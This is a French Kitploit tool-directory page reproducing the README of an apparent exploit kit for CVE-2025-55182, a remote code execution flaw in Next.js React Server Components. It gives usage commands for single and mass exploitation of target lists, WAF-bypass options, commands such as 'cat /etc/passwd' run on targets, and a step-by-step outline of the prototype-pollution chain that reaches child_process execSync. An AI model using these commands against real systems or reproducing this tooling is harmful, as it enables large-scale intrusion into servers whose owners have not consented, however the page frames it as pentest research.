Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-55182-NextJS-Scanner-React2Shell-PoC — Kit automatisé de détection et d'exploitation pour CVE-2025-55182, une RCE critique dans Next.js React Server Components. Dispose d'une empreinte multi-couche, d'un contournement WAF et d'un scan en masse pour les tests d'intrusion. | Kitploit
Outils/GitHubGitHub/exrienz/cve-2025-55182-nextjs-scanner-react2shell-poc
ReconnaissanceScanners de VulnérabilitésGénération de PayloadsExploitationExploitation d'Applications WebContournement de WAFTests d'IntrusionCommandement et Contrôle

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
GitHub
exrienz/cve-2025-55182-nextjs-scanner-react2shell-poc

CVE-2025-55182-NextJS-Scanner-React2Shell-PoC

Kit automatisé de détection et d'exploitation pour CVE-2025-55182, une RCE critique dans Next.js React Server Components. Dispose d'une empreinte multi-couche, d'un contournement WAF et d'un scan en masse pour les tests d'intrusion.

Voir le dépôt
16il y a 9 moisPas encore vérifié
Partager

Outil d'exploitation de CVE-2025-55182

Un outil complet de recherche en sécurité pour tester la vulnérabilité d'exécution de code à distance des composants serveur React de Next.js (CVE-2025-55182).

Vue d'ensemble

Cette boîte à outils fournit des capacités de détection et d'exploitation automatisées pour CVE-2025-55182, une vulnérabilité RCE critique affectant les applications Next.js utilisant les composants serveur React. La boîte à outils se compose de trois composants intégrés :

  • NextApp.py - Scanner intelligent d'empreinte digitale des applications Next.js
  • exploit.sh - Outil d'exploitation flexible pour cibles uniques ou multiples
  • auto_exploit.sh - Orchestrateur automatisé de bout en bout pour la détection et l'exploitation

Fonctionnalités

  • Détection multicouche : Analyse des en-têtes, balayage du corps et empreinte JavaScript
  • Score de confiance : Classification intelligente (Élevée/Moyenne/Faible) pour minimiser les faux positifs
  • Contournement WAF : Techniques intégrées pour contourner les pare-feu d'applications web courants
  • Analyse groupée : Traitement efficace de plusieurs cibles avec des rapports détaillés
  • Flux de travail automatisé : Détection et exploitation en une seule commande
  • Rapports détaillés : Fichiers de sortie complets avec résultats catégorisés

Prérequis

Composants Python

  • Python 3.x
  • Bibliothèque requests
pip3 install requests

Composants Bash

  • curl
  • openssl
  • Utilitaires Unix standards (sed, grep, awk, mktemp)

Installation

git clone https://github.com/yourusername/CVE-2025-55182-poc-tool.git
cd CVE-2025-55182-poc-tool
chmod +x exploit.sh auto_exploit.sh

Utilisation

Démarrage rapide (recommandé)

Le moyen le plus rapide de scanner et d'exploiter des cibles :

# Créez un fichier avec les URL cibles (une par ligne)
echo "https://example.com" > targets.txt

# Analyse et exploitation automatiques en une commande
./auto_exploit.sh -i targets.txt -s -c "id"

Détection uniquement

Identifier les applications Next.js sans exploitation :

python3 NextApp.py targets.txt

Fichiers de sortie :

  • confirmed_nextjs_targets.txt - Toutes les applications Next.js détectées
  • high_confidence_nextjs_targets.txt - Détections à haute confiance uniquement

Exploitation d'une cible unique

Tester des cibles individuelles :

# Exploitation de base
./exploit.sh -d https://target.com -c "whoami"

# Avec contournement WAF
./exploit.sh -d target.com -c "cat /etc/passwd" -w

# Taille personnalisée du contournement WAF
./exploit.sh -d target.com -c "ls -la" --waf-bypass --waf-size 256

# Ignorer la vérification SSL
./exploit.sh -d https://target.com -c "id" -k

Exploitation groupée

Option 1 : Flux de travail unifié (recommandé)

./auto_exploit.sh -i targets.txt -s -c "whoami"

Option 2 : Flux de travail manuel en deux étapes

# Étape 1 : Détecter les applications Next.js
python3 NextApp.py targets.txt

# Étape 2 : Exploiter les cibles confirmées
./auto_exploit.sh -c "id"

Options avancées

# Analyse automatique complète avec contournement WAF
./auto_exploit.sh -i targets.txt -s -w --waf-size 256 -c "whoami"

# Délais et délais d'attente personnalisés
./auto_exploit.sh -i targets.txt -s --delay 5 --timeout 30 -c "id"

# Ignorer la vérification SSL en mode groupé
./auto_exploit.sh -i targets.txt -s -k -c "hostname"

Référence des commandes

NextApp.py

python3 NextApp.py <fichier_cibles>

Arguments :

  • fichier_cibles - Fichier texte contenant les URL cibles (une par ligne)

exploit.sh

./exploit.sh [OPTIONS]

Options :

OptionDescriptionDéfaut
-d, --domainDomaine/URL ciblehttp://localhost:3000
-f, --fileFichier avec la liste des cibles-
-c, --commandCommande à exécuterid
-w, --waf-bypassActiver le contournement WAFDésactivé
--waf-size SIZETaille des données de contournement WAF (Ko)128
--timeout SECONDSDélai d'attente de la requête15
-k, --insecureIgnorer la vérification SSLDésactivé
--user-agent AGENTUser-Agent personnaliséMozilla/5.0...
-h, --helpAfficher le message d'aide-

auto_exploit.sh

./auto_exploit.sh [OPTIONS]

Options :

OptionDescriptionDéfaut
-i, --input FILEFichier d'entrée des ciblesconfirmed_nextjs_targets.txt
-o, --output FILEFichier de sortie des résultatsexploit_results.txt
-c, --command CMDCommande à exécuterid
-w, --waf-bypassActiver le contournement WAFDésactivé
--waf-size SIZETaille du contournement WAF (Ko)128
--timeout SECONDSDélai d'attente de la requête15
-k, --insecureIgnorer la vérification SSLDésactivé
--delay SECONDSDélai entre les requêtes2
-s, --scanAnalyser automatiquement pour Next.js d'abordDésactivé
-h, --helpAfficher le message d'aide-

Fichiers de sortie

confirmed_nextjs_targets.txt

Généré par NextApp.py - contient toutes les URL identifiées comme des applications Next.js.

high_confidence_nextjs_targets.txt

Généré par NextApp.py - contient uniquement les détections Next.js à haute confiance (score de confiance 100+).

exploit_results.txt

Généré par auto_exploit.sh - rapport d'exploitation complet comprenant :

  • Cibles vulnérables avec sortie de commande
  • Cibles non vulnérables
  • Erreurs et leurs détails
  • Statistiques récapitulatives

Méthodologie de détection

Le scanner utilise plusieurs techniques de détection avec un système de notation de confiance :

Analyse des en-têtes (50 points chacun)

  • En-têtes spécifiques Next.js : x-nextjs-*, x-vercel-*
  • x-powered-by: Next.js
  • Serveur : Vercel

Balayage du corps

  • Présence de __NEXT_DATA__ (100 points)
  • Modèle buildId de Next.js (50 points)
  • Chemins d'actifs _next/* (25-75 points selon la quantité)

Empreinte JavaScript (60 points)

  • __NEXT_DATA__, __NEXT_LOADED_PAGES__
  • middlewareManifest, self.__RSC_MANIFEST

Seuils de confiance :

  • Élevée (100+) : Plusieurs indicateurs forts
  • Moyenne (75-99) : Plusieurs indicateurs modérés
  • Faible (50-74) : Preuves minimes
  • En dessous de 50 : Rejeté comme faux positif

Mécanisme d'exploitation

L'exploit exploite une chaîne de pollution de prototype dans les composants serveur React de Next.js :

  1. Construit des données de formulaire multipart avec une charge utile imbriquée
  2. Pollue la chaîne __proto__ via la désérialisation JSON
  3. Injecte du JavaScript arbitraire dans _response._prefix
  4. Exécute des commandes via process.mainModule.require('child_process').execSync()
  5. Extrait les résultats de l'en-tête X-Action-Redirect
  6. Décode l'URL et formate la sortie

Techniques de contournement WAF

La boîte à outils inclut des capacités de contournement WAF intégrées :

  • Injection de données indésirables : Ajoute des données aléatoires pour contourner les filtres basés sur la taille
  • Limites dynamiques : Limites multipart aléatoires
  • Randomisation des ID de requête : ID uniques par requête
  • Taille configurable : Taille des données indésirables ajustable (défaut 128 Ko)

Activer avec les drapeaux -w ou --waf-bypass.

Exemples

Scanner et exploiter une application web

# Créer la liste des cibles
cat > targets.txt << EOF
https://app.example.com
https://dashboard.example.com
https://admin.example.com
EOF

# Lancer le scan unifié
./auto_exploit.sh -i targets.txt -s -c "whoami"

# Consulter les résultats
cat exploit_results.txt

Tester une cible unique avec contournement WAF

./exploit.sh -d https://target.com -c "cat /etc/passwd" -w --waf-size 256
Télécharger l’outil